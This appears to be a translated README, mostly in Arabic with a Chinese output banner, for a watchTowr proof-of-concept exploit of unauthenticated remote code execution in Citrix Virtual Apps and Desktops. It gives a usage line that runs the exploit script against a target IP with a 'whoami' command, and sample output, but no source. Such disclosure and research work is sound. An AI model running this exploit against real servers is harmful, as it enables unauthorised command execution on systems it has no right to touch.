
Citrix Virtual Apps and Desktops (XEN) - ثغرة تنفيذ أوامر عن بعد بدون مصادقة
Citrix التطبيقات الافتراضية وسطح المكتب (XEN) ثغرة تنفيذ كود عن بعد غير مصدقة
اطلع على مقالتنا في المدونة للحصول على معلومات تقنية مفصلة.
https://github.com/user-attachments/assets/563fd110-5321-49f7-8dc3-48eb0a53e0f9
python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
CVE-xxxx-xxxxx.py
(*) Citrix 虚拟应用和桌面 未认证远程代码执行 (CVE-xxxx-xxxxx) 漏洞利用 by watchTowr
CVE: [CVE-xxxx-xxxxx]
[INFO] 命令已成功发送至 192.168.1.120!
جميع إصدارات Citrix Virtual Apps and Desktops 7 2402 LTSR والإصدارات السابقة معرضة لهذه الثغرة. لمزيد من التفاصيل، راجع إعلان Citrix الرسمي.
تم كتابة هذه الأداة الاستغلالية بواسطة Sina Kheirkhah (@SinSinology) من watchTowr (@watchtowrcyber).
للحصول على أحدث مستجدات أبحاث الأمان، تابع فريق مختبر watchTowr: